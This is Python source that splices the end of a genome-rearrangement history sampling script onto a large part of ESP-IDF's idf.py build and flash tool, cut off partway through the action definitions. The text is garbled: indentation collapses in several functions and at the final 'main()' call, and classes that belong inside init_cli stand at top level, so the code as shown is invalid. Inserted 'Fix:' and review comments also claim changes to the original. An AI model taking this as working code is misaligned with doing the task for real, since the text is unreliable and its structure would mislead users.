			OC = pickle.load(open('CACTUS_%i' % options.index))
			## Going through all the histories to the last in file
			file= open('HISTORIES_%i' % (options.index))
			while True:
				try:
					H = pickle.load(file)
				except:
					break  # NOTE(review): bare except — stops at EOF but also swallows corrupt pickles
			file.close()
		else:
			## Just moving from there
			pickle.dump(random.getstate(), open("STATE_%i" % options.index, "wb"))
			C = pickle.load(open('CACTUS'))
			## Sampling possible cactus
			NC = normalized.NormalizedCactus(C)
			if debug.RATIO_TO_OFFSET:
				BC = balancedCactus.BalancedCactus(NC)
			else:
				BC = NC
			OC = oriented.OrientedCactus(BC)
			## Saving sampled cactus
			pickle.dump(OC, open('CACTUS_%i' % options.index, "wb"))
		# Moving into historical space
		if options.integer:
			debug.INTEGER_HISTORY = True
		if H is None:
			H = cycleCover.initialHistory(OC)
		FH = flattened.flattenGraph(H)
		S = FH.simplifyStubsAndTrivials()
		F = S.removeLowRatioEvents(debug.RATIO_CUTOFF)
		O = ordered.OrderedHistory(F)
		# Preparing file for progressive write (append when continuing a run)
		if options.cont:
			stats_file = open("HISTORY_STATS_%li" % options.index, "a")
			pickle_file = open('HISTORIES_%i' % options.index, "ab")
			braney_file = gzip.open("HISTORIES_%i.braney" % options.index, "a")
		else:
			stats_file = open("HISTORY_STATS_%li" % options.index, "w")
			pickle_file = open('HISTORIES_%i' % options.index, "wb")
			braney_file = gzip.open("HISTORIES_%i.braney" % options.index, "w")
		stats_file.write("%s\n" % H.stats())
		#pickle.dump(H, pickle_file)
		braney_file.write("%s\n" % O.braneyText(0, H.rearrangementCost()))
		#tree_file = open("HISTORY_TREES_%li" % options.index, "w")
		#tree_file.write("%s\n" % O.newick())
		tree_file = None
		# Sampling
		SH = sampleGraphCycles.sample(H, options.size, pickle_file, stats_file, braney_file, tree_file)
		# Cleaning up
		stats_file.close()
		pickle_file.close()
		braney_file.close()
		#tree_file.close()
		## Removing temp file
		if os.path.exists("STATE_%i" % options.index):
			os.remove("STATE_%i" % options.index)
if __name__ == "__main__":
main()
| |
#!/usr/bin/env python
#
# 'idf.py' is a top-level config/build command line tool for ESP-IDF
#
# You don't have to use idf.py, you can use cmake directly
# (or use cmake in an IDE)
#
#
#
# Copyright 2019 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# WARNING: we don't check for Python build-time dependencies until
# check_environment() function below. If possible, avoid importing
# any external libraries here - put in external script, or import in
# their specific function instead.
import codecs
import json
import locale
import multiprocessing
import os
import os.path
import re
import shutil
import subprocess
import sys
class FatalError(RuntimeError):
    """
    Wrapper class for runtime errors that aren't caused by bugs in idf.py or the build process.
    """
    pass
# Use this Python interpreter for any subprocesses we launch
PYTHON = sys.executable
# note: os.environ changes don't automatically propagate to child processes,
# you have to pass env=os.environ explicitly anywhere that we create a process
os.environ["PYTHON"] = sys.executable
# Name of the program, normally 'idf.py'.
# Can be overridden from idf.bat using IDF_PY_PROGRAM_NAME
PROG = os.getenv("IDF_PY_PROGRAM_NAME", sys.argv[0])
# Make flavors, across the various kinds of Windows environments & POSIX...
if "MSYSTEM" in os.environ:  # MSYS
    MAKE_CMD = "make"
    MAKE_GENERATOR = "MSYS Makefiles"
elif os.name == "nt":  # other Windows
    MAKE_CMD = "mingw32-make"
    MAKE_GENERATOR = "MinGW Makefiles"
else:
    MAKE_CMD = "make"
    MAKE_GENERATOR = "Unix Makefiles"
GENERATORS = [
    # ('generator name', 'build command line', 'version command line', 'verbose flag')
    ("Ninja", ["ninja"], ["ninja", "--version"], "-v"),
    (
        MAKE_GENERATOR,
        [MAKE_CMD, "-j", str(multiprocessing.cpu_count() + 2)],
        [MAKE_CMD, "--version"],
        "VERBOSE=1",
    ),
]
# Lookup tables derived from GENERATORS: generator name -> build command / verbose flag
GENERATOR_CMDS = dict((a[0], a[1]) for a in GENERATORS)
GENERATOR_VERBOSE = dict((a[0], a[3]) for a in GENERATORS)
def _run_tool(tool_name, args, cwd):
def quote_arg(arg):
" Quote 'arg' if necessary "
if " " in arg and not (arg.startswith('"') or arg.startswith("'")):
return "'" + arg + "'"
return arg
display_args = " ".join(quote_arg(arg) for arg in args)
print("Running %s in directory %s" % (tool_name, quote_arg(cwd)))
print('Executing "%s"...' % str(display_args))
try:
# Note: we explicitly pass in os.environ here, as we may have set IDF_PATH there during startup
subprocess.check_call(args, env=os.environ, cwd=cwd)
except subprocess.CalledProcessError as e:
raise FatalError("%s failed with exit code %d" % (tool_name, e.returncode))
def _realpath(path):
"""
Return the cannonical path with normalized case.
It is useful on Windows to comparision paths in case-insensitive manner.
On Unix and Mac OS X it works as `os.path.realpath()` only.
"""
return os.path.normcase(os.path.realpath(path))
def check_environment():
    """
    Verify the environment contains the top-level tools we need to operate
    (cmake will check a lot of other things)
    """
    if not executable_exists(["cmake", "--version"]):
        raise FatalError("'cmake' must be available on the PATH to use %s" % PROG)
    # find the directory idf.py is in, then the parent directory of this, and assume this is IDF_PATH
    detected_idf_path = _realpath(os.path.join(os.path.dirname(__file__), ".."))
    if "IDF_PATH" in os.environ:
        # _realpath normalizes case so this comparison also works on Windows
        set_idf_path = _realpath(os.environ["IDF_PATH"])
        if set_idf_path != detected_idf_path:
            print(
                "WARNING: IDF_PATH environment variable is set to %s but %s path indicates IDF directory %s. "
                "Using the environment variable directory, but results may be unexpected..."
                % (set_idf_path, PROG, detected_idf_path)
            )
    else:
        print("Setting IDF_PATH environment variable: %s" % detected_idf_path)
        os.environ["IDF_PATH"] = detected_idf_path
    # check Python dependencies
    print("Checking Python dependencies...")
    try:
        subprocess.check_call(
            [
                os.environ["PYTHON"],
                os.path.join(
                    os.environ["IDF_PATH"], "tools", "check_python_dependencies.py"
                ),
            ],
            env=os.environ,
        )
    except subprocess.CalledProcessError:
        # exit without extra output — presumably the checker script printed
        # its own diagnostics; TODO confirm
        raise SystemExit(1)
def executable_exists(args):
    """Return True if running *args* as a command succeeds, False otherwise.

    Any failure (missing binary, non-zero exit, OS error) counts as "does
    not exist".
    """
    try:
        subprocess.check_output(args)
    except Exception:
        return False
    return True
def detect_cmake_generator():
    """Return the first supported cmake generator whose build tool is on PATH.

    Raises FatalError when neither ninja nor GNU make can be found.
    """
    found = next(
        (name for name, _, probe_cmd, _ in GENERATORS if executable_exists(probe_cmd)),
        None,
    )
    if found is not None:
        return found
    raise FatalError(
        "To use %s, either the 'ninja' or 'GNU make' build tool must be available in the PATH"
        % PROG
    )
def _strip_quotes(value, regexp=re.compile(r"^\"(.*)\"$|^'(.*)'$|^(.*)$")):
"""
Strip quotes like CMake does during parsing cache entries
"""
return [x for x in regexp.match(value).groups() if x is not None][0].rstrip()
def _new_cmakecache_entries(cache_path, new_cache_entries):
if not os.path.exists(cache_path):
return True
current_cache = parse_cmakecache(cache_path)
if new_cache_entries:
current_cache = parse_cmakecache(cache_path)
for entry in new_cache_entries:
key, value = entry.split("=", 1)
current_value = current_cache.get(key, None)
if current_value is None or _strip_quotes(value) != current_value:
return True
return False
def _ensure_build_directory(args, always_run_cmake=False):
    """Check the build directory exists and that cmake has been run there.

    If this isn't the case, create the build directory (if necessary) and
    do an initial cmake run to configure it.

    This function will also check args.generator parameter. If the parameter is incompatible with
    the build directory, an error is raised. If the parameter is None, this function will set it to
    an auto-detected default generator or to the value already configured in the build directory.
    """
    project_dir = args.project_dir
    # Verify the project directory
    if not os.path.isdir(project_dir):
        if not os.path.exists(project_dir):
            raise FatalError("Project directory %s does not exist" % project_dir)
        else:
            raise FatalError("%s must be a project directory" % project_dir)
    if not os.path.exists(os.path.join(project_dir, "CMakeLists.txt")):
        raise FatalError(
            "CMakeLists.txt not found in project directory %s" % project_dir
        )
    # Verify/create the build directory
    build_dir = args.build_dir
    if not os.path.isdir(build_dir):
        os.makedirs(build_dir)
    cache_path = os.path.join(build_dir, "CMakeCache.txt")
    # Normalize to a plain list and always pin the ccache setting in the cache
    args.define_cache_entry = list(args.define_cache_entry)
    args.define_cache_entry.append("CCACHE_ENABLE=%d" % args.ccache)
    if always_run_cmake or _new_cmakecache_entries(cache_path, args.define_cache_entry):
        if args.generator is None:
            args.generator = detect_cmake_generator()
        try:
            cmake_args = [
                "cmake",
                "-G",
                args.generator,
                "-DPYTHON_DEPS_CHECKED=1",
                "-DESP_PLATFORM=1",
            ]
            if not args.no_warnings:
                cmake_args += ["--warn-uninitialized"]
            if args.define_cache_entry:
                cmake_args += ["-D" + d for d in args.define_cache_entry]
            cmake_args += [project_dir]
            _run_tool("cmake", cmake_args, cwd=args.build_dir)
        except Exception:
            # don't allow partially valid CMakeCache.txt files,
            # to keep the "should I run cmake?" logic simple
            if os.path.exists(cache_path):
                os.remove(cache_path)
            raise
    # Learn some things from the CMakeCache.txt file in the build directory
    cache = parse_cmakecache(cache_path)
    try:
        generator = cache["CMAKE_GENERATOR"]
    except KeyError:
        generator = detect_cmake_generator()
    if args.generator is None:
        args.generator = (
            generator
        )  # reuse the previously configured generator, if none was given
    if generator != args.generator:
        raise FatalError(
            "Build is configured for generator '%s' not '%s'. Run '%s fullclean' to start again."
            % (generator, args.generator, PROG)
        )
    try:
        # Cross-check that the build dir was configured for THIS project
        home_dir = cache["CMAKE_HOME_DIRECTORY"]
        if _realpath(home_dir) != _realpath(project_dir):
            raise FatalError(
                "Build directory '%s' configured for project '%s' not '%s'. Run '%s fullclean' to start again."
                % (build_dir, _realpath(home_dir), _realpath(project_dir), PROG)
            )
    except KeyError:
        pass  # if cmake failed part way, CMAKE_HOME_DIRECTORY may not be set yet
def parse_cmakecache(path):
    """Parse the CMakeCache file at *path* into a {name: value} dict.

    Cache lines look like NAME:TYPE=VALUE; the TYPE field is currently
    ignored. Comment lines and anything else that doesn't match the pattern
    are skipped.
    """
    entry_re = re.compile(r"^([^#/:=]+):([^:=]+)=(.*)\n$")
    entries = {}
    with open(path) as cache_file:
        for raw_line in cache_file:
            match = entry_re.match(raw_line)
            if match is not None:
                name, _cache_type, value = match.groups()
                entries[name] = value
    return entries
def build_target(target_name, ctx, args):
    """
    Execute the target build system to build target 'target_name'

    Calls _ensure_build_directory() which will run cmake to generate a build
    directory (with the specified generator) as needed.
    """
    _ensure_build_directory(args)
    # Fix: copy the command list — the original `generator_cmd += [...]` below
    # mutated the shared list stored in GENERATOR_CMDS, so the verbose flag
    # accumulated across repeated build_target() calls in one idf.py run.
    generator_cmd = list(GENERATOR_CMDS[args.generator])
    if args.ccache:
        # Setting CCACHE_BASEDIR & CCACHE_NO_HASHDIR ensures that project paths aren't stored in the ccache entries
        # (this means ccache hits can be shared between different projects. It may mean that some debug information
        # will point to files in another project, if these files are perfect duplicates of each other.)
        #
        # It would be nicer to set these from cmake, but there's no cross-platform way to set build-time environment
        # os.environ["CCACHE_BASEDIR"] = args.build_dir
        # os.environ["CCACHE_NO_HASHDIR"] = "1"
        pass
    if args.verbose:
        generator_cmd += [GENERATOR_VERBOSE[args.generator]]
    _run_tool(generator_cmd[0], generator_cmd + [target_name], args.build_dir)
def _get_esptool_args(args):
    """Assemble the common esptool.py invocation prefix.

    Returns [python, esptool.py, -p PORT, -b BAUD, --after ...], reading the
    '--after' value from the flasher_args.json the build system generated.
    Falls back to an auto-detected serial port when args.port is unset.
    """
    esptool_path = os.path.join(
        os.environ["IDF_PATH"], "components/esptool_py/esptool/esptool.py"
    )
    if args.port is None:
        args.port = get_default_serial_port()
    result = [PYTHON, esptool_path]
    result += ["-p", args.port]
    result += ["-b", str(args.baud)]
    with open(os.path.join(args.build_dir, "flasher_args.json")) as f:
        flasher_args = json.load(f)
    extra_esptool_args = flasher_args["extra_esptool_args"]
    result += ["--after", extra_esptool_args["after"]]
    return result
def flash(action, ctx, args):
    """
    Run esptool to flash the entire project, from an argfile generated by the build system
    """
    flasher_args_path = {  # action -> name of flasher args file generated by build system
        "bootloader-flash": "flash_bootloader_args",
        "partition_table-flash": "flash_partition_table_args",
        "app-flash": "flash_app_args",
        "flash": "flash_project_args",
        "encrypted-app-flash": "flash_encrypted_app_args",
        "encrypted-flash": "flash_encrypted_project_args",
    }[
        action
    ]
    esptool_args = _get_esptool_args(args)
    # '@<file>': the remaining write_flash arguments come from the args file
    esptool_args += ["write_flash", "@" + flasher_args_path]
    _run_tool("esptool.py", esptool_args, args.build_dir)
def erase_flash(action, ctx, args):
    """Run esptool.py's erase_flash command against the configured port."""
    esptool_args = _get_esptool_args(args)
    esptool_args += ["erase_flash"]
    _run_tool("esptool.py", esptool_args, args.build_dir)
def monitor(action, ctx, args, print_filter):
    """
    Run idf_monitor.py to watch build output
    """
    if args.port is None:
        args.port = get_default_serial_port()
    desc_path = os.path.join(args.build_dir, "project_description.json")
    # Configure the build directory first if the project description is missing
    if not os.path.exists(desc_path):
        _ensure_build_directory(args)
    with open(desc_path, "r") as f:
        project_desc = json.load(f)
    elf_file = os.path.join(args.build_dir, project_desc["app_elf"])
    if not os.path.exists(elf_file):
        raise FatalError(
            "ELF file '%s' not found. You need to build & flash the project before running 'monitor', "
            "and the binary on the device must match the one in the build directory exactly. "
            "Try '%s flash monitor'." % (elf_file, PROG)
        )
    idf_monitor = os.path.join(os.environ["IDF_PATH"], "tools/idf_monitor.py")
    monitor_args = [PYTHON, idf_monitor]
    if args.port is not None:
        monitor_args += ["-p", args.port]
    monitor_args += ["-b", project_desc["monitor_baud"]]
    if print_filter is not None:
        monitor_args += ["--print_filter", print_filter]
    monitor_args += [elf_file]
    idf_py = [PYTHON] + get_commandline_options(ctx)  # commands to re-run idf.py
    # '-m' passes the quoted idf.py command line through to idf_monitor
    monitor_args += ["-m", " ".join("'%s'" % a for a in idf_py)]
    # run via winpty when inside an MSYS environment
    if "MSYSTEM" in os.environ:
        monitor_args = ["winpty"] + monitor_args
    _run_tool("idf_monitor", monitor_args, args.project_dir)
def clean(action, ctx, args):
    """Invoke the generator's 'clean' target; no-op if no build directory."""
    if not os.path.isdir(args.build_dir):
        print("Build directory '%s' not found. Nothing to clean." % args.build_dir)
        return
    build_target("clean", ctx, args)
def reconfigure(action, ctx, args):
    """Force a cmake re-run in the build directory (always_run_cmake=True)."""
    _ensure_build_directory(args, True)
def _delete_windows_symlinks(directory):
"""
It deletes symlinks recursively on Windows. It is useful for Python 2 which doesn't detect symlinks on Windows.
"""
deleted_paths = []
if os.name == "nt":
import ctypes
for root, dirnames, _filenames in os.walk(directory):
for d in dirnames:
full_path = os.path.join(root, d)
try:
full_path = full_path.decode("utf-8")
except Exception:
pass
if ctypes.windll.kernel32.GetFileAttributesW(full_path) & 0x0400:
os.rmdir(full_path)
deleted_paths.append(full_path)
return deleted_paths
def fullclean(action, ctx, args):
    """Delete the entire contents of the build directory, after safety checks.

    Refuses to operate on directories that don't look like CMake build
    directories (no CMakeCache.txt) or that contain source-control/project
    files, to avoid destroying user data.
    """
    build_dir = args.build_dir
    if not os.path.isdir(build_dir):
        print("Build directory '%s' not found. Nothing to clean." % build_dir)
        return
    if len(os.listdir(build_dir)) == 0:
        print("Build directory '%s' is empty. Nothing to clean." % build_dir)
        return
    if not os.path.exists(os.path.join(build_dir, "CMakeCache.txt")):
        raise FatalError(
            "Directory '%s' doesn't seem to be a CMake build directory. Refusing to automatically "
            "delete files in this directory. Delete the directory manually to 'clean' it."
            % build_dir
        )
    red_flags = ["CMakeLists.txt", ".git", ".svn"]
    for red in red_flags:
        red = os.path.join(build_dir, red)
        if os.path.exists(red):
            raise FatalError(
                "Refusing to automatically delete files in directory containing '%s'. Delete files manually if you're sure."
                % red
            )
    # OK, delete everything in the build directory...
    # Note: Python 2.7 doesn't detect symlinks on Windows (it is supported form 3.2). Tools promising to not
    # follow symlinks will actually follow them. Deleting the build directory with symlinks deletes also items
    # outside of this directory.
    deleted_symlinks = _delete_windows_symlinks(build_dir)
    # Fix: report whenever ANY symlink was deleted (the previous "> 1" check
    # silently skipped the single-symlink case).
    if args.verbose and len(deleted_symlinks) > 0:
        print(
            "The following symlinks were identified and removed:\n%s"
            % "\n".join(deleted_symlinks)
        )
    for f in os.listdir(
        build_dir
    ):  # TODO: once we are Python 3 only, this can be os.scandir()
        f = os.path.join(build_dir, f)
        if args.verbose:
            print("Removing: %s" % f)
        if os.path.isdir(f):
            shutil.rmtree(f)
        else:
            os.remove(f)
def _safe_relpath(path, start=None):
""" Return a relative path, same as os.path.relpath, but only if this is possible.
It is not possible on Windows, if the start directory and the path are on different drives.
"""
try:
return os.path.relpath(path, os.curdir if start is None else start)
except ValueError:
return os.path.abspath(path)
def get_commandline_options(ctx):
    """Return the command-line tokens preceding the first action name.

    Scans sys.argv and stops at the first token that names a known command
    (or alias); everything before it is a global option. This deliberately
    ignores the argument parsing already done by Click.
    """
    known_actions = ctx.command.commands_with_aliases
    leading = []
    for token in sys.argv:
        if token in known_actions:
            break
        leading.append(token)
    return leading
def get_default_serial_port():
    """ Return a default serial port. esptool can do this (smarter), but it can create
    inconsistencies where esptool.py uses one port and idf_monitor uses another.

    Same logic as esptool.py search order, reverse sort by name and choose the first port.
    """
    # Import is done here in order to move it after the check_environment() ensured that pyserial has been installed
    import serial.tools.list_ports

    ports = list(reversed(sorted(p.device for p in serial.tools.list_ports.comports())))
    try:
        print(
            "Choosing default port %s (use '-p PORT' option to set a specific serial port)"
            % ports[0].encode("ascii", "ignore")
        )
        return ports[0]
    except IndexError:
        # ports is empty: no serial device detected at all
        raise RuntimeError(
            "No serial ports found. Connect a device, or use '-p PORT' option to set a specific port."
        )
class PropertyDict(dict):
    """A dict whose keys are also readable/writable as attributes."""

    def __init__(self, *args, **kwargs):
        dict.__init__(self, *args, **kwargs)
        # Aliasing __dict__ to the dict itself makes attribute access and item
        # access share the same storage.
        self.__dict__ = self
def init_cli():
    """Build and return the click-based command line interface for idf.py.

    Combines the built-in build/clean/serial action lists with any extensions
    found in the project's idf_ext.py, and returns a CLI (click.MultiCommand).
    """
    # Click is imported here to run it after check_environment()
    import click
class Task(object):
    """One deferred action: the callback to run, plus its options and dependency lists."""

    def __init__(
        self, callback, name, aliases, dependencies, order_dependencies, action_args
    ):
        self.callback = callback
        self.name = name
        self.aliases = aliases
        self.dependencies = dependencies
        self.order_dependencies = order_dependencies
        self.action_args = action_args

    def run(self, context, global_args, action_args=None):
        """Invoke the callback; falls back to the stored action arguments."""
        args = self.action_args if action_args is None else action_args
        self.callback(self.name, context, global_args, **args)
class Action(click.Command):
    """A click Command whose invocation produces a deferred Task instead of running immediately."""

    def __init__(
        self,
        name=None,
        aliases=None,
        dependencies=None,
        order_dependencies=None,
        **kwargs
    ):
        super(Action, self).__init__(name, **kwargs)

        # Fall back to the callback's function name when no explicit name is given.
        self.name = self.name or self.callback.__name__

        if aliases is None:
            aliases = []
        self.aliases = aliases

        # Fall back to the callback's docstring for help text.
        self.help = self.help or self.callback.__doc__
        if self.help is None:
            self.help = ""

        if dependencies is None:
            dependencies = []

        if order_dependencies is None:
            order_dependencies = []

        # Show first line of help if short help is missing
        self.short_help = self.short_help or self.help.split("\n")[0]

        # Add aliases to help string
        if aliases:
            aliases_help = "Aliases: %s." % ", ".join(aliases)

            self.help = "\n".join([self.help, aliases_help])
            self.short_help = " ".join([aliases_help, self.short_help])

        if self.callback is not None:
            callback = self.callback

            # Wrap the real callback so that click parsing merely records a Task;
            # CLI.execute_tasks later runs the tasks in dependency order.
            def wrapped_callback(**action_args):
                return Task(
                    callback=callback,
                    name=self.name,
                    dependencies=dependencies,
                    order_dependencies=order_dependencies,
                    action_args=action_args,
                    aliases=self.aliases,
                )

            self.callback = wrapped_callback
class Argument(click.Argument):
    """Positional argument"""

    def __init__(self, **kwargs):
        # The action dicts use the key "names"; click expects positional param_decls.
        names = kwargs.pop("names")
        super(Argument, self).__init__(names, **kwargs)
class Scope(object):
    """
    Scope for sub-command option.
    possible values:
    - default - only available on defined level (global/action)
    - global - When defined for action, also available as global
    - shared - Opposite to 'global': when defined in global scope, also available for all actions
    """

    SCOPES = ("default", "global", "shared")

    def __init__(self, scope=None):
        if scope is None:
            scope = "default"
        elif isinstance(scope, Scope):
            # Copy-construct from another Scope.
            scope = str(scope)
        elif not (isinstance(scope, str) and scope in self.SCOPES):
            raise FatalError("Unknown scope for option: %s" % scope)
        self._scope = scope

    @property
    def is_global(self):
        return self._scope == "global"

    @property
    def is_shared(self):
        return self._scope == "shared"

    def __str__(self):
        return self._scope
class Option(click.Option):
    """Option that knows whether it should be global"""

    def __init__(self, scope=None, **kwargs):
        # The action dicts use the key "names"; click expects "param_decls".
        kwargs["param_decls"] = kwargs.pop("names")
        super(Option, self).__init__(**kwargs)

        self.scope = Scope(scope)

        if self.scope.is_global:
            # NOTE(review): assumes `help` was provided (str), otherwise this
            # would be None += str. All global options in this file pass help.
            self.help += " This option can be used at most once either globally, or for one subcommand."
class CLI(click.MultiCommand):
    """Action list contains all actions with options available for CLI"""

    def __init__(self, action_lists=None, help=None):
        # chain=True lets several actions be given in one invocation; the parsed
        # Task objects are handed to execute_tasks once parsing finishes.
        super(CLI, self).__init__(
            chain=True,
            invoke_without_command=True,
            result_callback=self.execute_tasks,
            context_settings={"max_content_width": 140},
            help=help,
        )
        self._actions = {}
        self.global_action_callbacks = []
        self.commands_with_aliases = {}

        if action_lists is None:
            action_lists = []

        shared_options = []

        for action_list in action_lists:
            # Global options
            for option_args in action_list.get("global_options", []):
                option = Option(**option_args)
                self.params.append(option)

                if option.scope.is_shared:
                    shared_options.append(option)

        for action_list in action_lists:
            # Global options validators
            self.global_action_callbacks.extend(
                action_list.get("global_action_callbacks", [])
            )

        for action_list in action_lists:
            # Actions
            for name, action in action_list.get("actions", {}).items():
                arguments = action.pop("arguments", [])
                options = action.pop("options", [])

                if arguments is None:
                    arguments = []

                if options is None:
                    options = []

                self._actions[name] = Action(name=name, **action)
                # Map every alias (and the name itself) back to the canonical name.
                for alias in [name] + action.get("aliases", []):
                    self.commands_with_aliases[alias] = name

                for argument_args in arguments:
                    self._actions[name].params.append(Argument(**argument_args))

                # Add all shared options
                for option in shared_options:
                    self._actions[name].params.append(option)

                for option_args in options:
                    option = Option(**option_args)

                    if option.scope.is_shared:
                        raise FatalError(
                            '"%s" is defined for action "%s". '
                            ' "shared" options can be declared only on global level' % (option.name, name)
                        )

                    # Promote options to global if see for the first time
                    if option.scope.is_global and option.name not in [o.name for o in self.params]:
                        self.params.append(option)

                    self._actions[name].params.append(option)

    def list_commands(self, ctx):
        # click hook: all known action names, sorted for stable help output.
        return sorted(self._actions)

    def get_command(self, ctx, name):
        # click hook: resolve aliases to the canonical action.
        return self._actions.get(self.commands_with_aliases.get(name))

    def _print_closing_message(self, args, actions):
        # print a closing message of some kind
        #
        if "flash" in str(actions):
            print("Done")
            return

        # Otherwise, if we built any binaries print a message about
        # how to flash them
        def print_flashing_message(title, key):
            print("\n%s build complete. To flash, run this command:" % title)

            # NOTE(review): relies on a module-level `import json` elsewhere in this file.
            with open(os.path.join(args.build_dir, "flasher_args.json")) as f:
                flasher_args = json.load(f)

            def flasher_path(f):
                return _safe_relpath(os.path.join(args.build_dir, f))

            if key != "project":  # flashing a single item
                cmd = ""
                if (
                    key == "bootloader"
                ):  # bootloader needs --flash-mode, etc to be passed in
                    cmd = " ".join(flasher_args["write_flash_args"]) + " "

                cmd += flasher_args[key]["offset"] + " "
                cmd += flasher_path(flasher_args[key]["file"])
            else:  # flashing the whole project
                cmd = " ".join(flasher_args["write_flash_args"]) + " "
                # Sort flashable items by their numeric flash offset.
                flash_items = sorted(
                    (
                        (o, f)
                        for (o, f) in flasher_args["flash_files"].items()
                        if len(o) > 0
                    ),
                    key=lambda x: int(x[0], 0),
                )

                for o, f in flash_items:
                    cmd += o + " " + flasher_path(f) + " "

            print(
                "%s -p %s -b %s --after %s write_flash %s"
                % (
                    _safe_relpath(
                        "%s/components/esptool_py/esptool/esptool.py"
                        % os.environ["IDF_PATH"]
                    ),
                    args.port or "(PORT)",
                    args.baud,
                    flasher_args["extra_esptool_args"]["after"],
                    cmd.strip(),
                )
            )
            print(
                "or run 'idf.py -p %s %s'"
                % (
                    args.port or "(PORT)",
                    key + "-flash" if key != "project" else "flash",
                )
            )

        if "all" in actions or "build" in actions:
            print_flashing_message("Project", "project")
        else:
            if "app" in actions:
                print_flashing_message("App", "app")
            if "partition_table" in actions:
                print_flashing_message("Partition Table", "partition_table")
            if "bootloader" in actions:
                print_flashing_message("Bootloader", "bootloader")

    def execute_tasks(self, tasks, **kwargs):
        """Run the parsed Task list, resolving dependencies and propagating global options."""
        ctx = click.get_current_context()
        global_args = PropertyDict(ctx.params)

        # Set propagated global options
        for task in tasks:
            for key in list(task.action_args):
                option = next((o for o in ctx.command.params if o.name == key), None)
                if option and (option.scope.is_global or option.scope.is_shared):
                    local_value = task.action_args.pop(key)
                    global_value = global_args[key]
                    default = () if option.multiple else option.default

                    # A global/shared option may be set at most once (either globally
                    # or on one subcommand) to a non-default value.
                    if global_value != default and local_value != default and global_value != local_value:
                        raise FatalError(
                            'Option "%s" provided for "%s" is already defined to a different value. '
                            "This option can appear at most once in the command line." % (key, task.name)
                        )
                    if local_value != default:
                        global_args[key] = local_value

        # Validate global arguments
        for action_callback in ctx.command.global_action_callbacks:
            action_callback(ctx, global_args, tasks)

        # very simple dependency management
        completed_tasks = set()

        if not tasks:
            print(ctx.get_help())
            ctx.exit()

        while tasks:
            task = tasks[0]
            tasks_dict = dict([(t.name, t) for t in tasks])

            name_with_aliases = task.name
            if task.aliases:
                name_with_aliases += " (aliases: %s)" % ", ".join(task.aliases)

            ready_to_run = True
            for dep in task.dependencies:
                if dep not in completed_tasks:
                    # A hard dependency that hasn't run yet: queue it in front.
                    print(
                        'Adding %s\'s dependency "%s" to list of actions'
                        % (task.name, dep)
                    )
                    dep_task = ctx.invoke(ctx.command.get_command(ctx, dep))

                    # Remove global options from dependent tasks
                    for key in list(dep_task.action_args):
                        option = next((o for o in ctx.command.params if o.name == key), None)
                        if option and (option.scope.is_global or option.scope.is_shared):
                            dep_task.action_args.pop(key)

                    tasks.insert(0, dep_task)
                    ready_to_run = False

            for dep in task.order_dependencies:
                # Order-only dependency: if it's queued but not done, run it first.
                if dep in tasks_dict.keys() and dep not in completed_tasks:
                    tasks.insert(0, tasks.pop(tasks.index(tasks_dict[dep])))
                    ready_to_run = False

            if ready_to_run:
                tasks.pop(0)

                if task.name in completed_tasks:
                    print(
                        "Skipping action that is already done: %s"
                        % name_with_aliases
                    )
                else:
                    print("Executing action: %s" % name_with_aliases)
                    task.run(ctx, global_args, task.action_args)

                completed_tasks.add(task.name)

        self._print_closing_message(global_args, completed_tasks)

    @staticmethod
    def merge_action_lists(*action_lists):
        """Merge several action dicts into one (options/actions/callbacks combined)."""
        merged_actions = {
            "global_options": [],
            "actions": {},
            "global_action_callbacks": [],
        }
        for action_list in action_lists:
            merged_actions["global_options"].extend(
                action_list.get("global_options", [])
            )
            merged_actions["actions"].update(action_list.get("actions", {}))
            merged_actions["global_action_callbacks"].extend(
                action_list.get("global_action_callbacks", [])
            )
        return merged_actions
# That's a tiny parser that parse project-dir even before constructing
# fully featured click parser to be sure that extensions are loaded from the right place
@click.command(
    add_help_option=False,
    context_settings={"allow_extra_args": True, "ignore_unknown_options": True},
)
@click.option("-C", "--project-dir", default=os.getcwd())
def parse_project_dir(project_dir):
    # NOTE(review): _realpath is defined elsewhere in this file.
    return _realpath(project_dir)

# standalone_mode=False stops click from calling sys.exit(), so we get the value back.
project_dir = parse_project_dir(standalone_mode=False)
# Load base idf commands
def validate_root_options(ctx, args, tasks):
    """Global-action callback: normalise project/build dirs, reject build dir == project dir."""
    args.project_dir = _realpath(args.project_dir)
    if args.build_dir is not None and args.project_dir == _realpath(args.build_dir):
        raise FatalError(
            "Setting the build directory to the project directory is not supported. Suggest dropping "
            "--build-dir option, the default is a 'build' subdirectory inside the project directory."
        )
    if args.build_dir is None:
        # Default build dir is <project>/build.
        args.build_dir = os.path.join(args.project_dir, "build")
    args.build_dir = _realpath(args.build_dir)
# Possible keys for action dict are: global_options, actions and global_action_callbacks
# This option list is re-used by most build-related actions below.
global_options = [
    {
        "names": ["-D", "--define-cache-entry"],
        "help": "Create a cmake cache entry.",
        "scope": "global",
        "multiple": True,
    }
]
# Top-level (root) options and the callback that validates them.
root_options = {
    "global_options": [
        {
            "names": ["-C", "--project-dir"],
            "help": "Project directory.",
            "type": click.Path(),
            "default": os.getcwd(),
        },
        {
            "names": ["-B", "--build-dir"],
            "help": "Build directory.",
            "type": click.Path(),
            "default": None,
        },
        {
            "names": ["-n", "--no-warnings"],
            "help": "Disable Cmake warnings.",
            "is_flag": True,
            # Fixed: an is_flag option must default to False; with the previous
            # default of True the flag was always "on", so -n had no effect and
            # CMake warnings were unconditionally disabled.
            "default": False,
        },
        {
            "names": ["-v", "--verbose"],
            "help": "Verbose build output.",
            "is_flag": True,
            "default": False,
        },
        {
            "names": ["--ccache/--no-ccache"],
            "help": "Use ccache in build. Disabled by default.",
            "is_flag": True,
            "default": False,
        },
        {
            "names": ["-G", "--generator"],
            "help": "CMake generator.",
            "type": click.Choice(GENERATOR_CMDS.keys()),
        },
    ],
    "global_action_callbacks": [validate_root_options],
}
# Build-related actions; all of them dispatch to build_target.
build_actions = {
    "actions": {
        "all": {
            "aliases": ["build"],
            "callback": build_target,
            "short_help": "Build the project.",
            "help": "Build the project. This can involve multiple steps:\n\n"
            + "1. Create the build directory if needed. The sub-directory 'build' is used to hold build output, "
            + "although this can be changed with the -B option.\n\n"
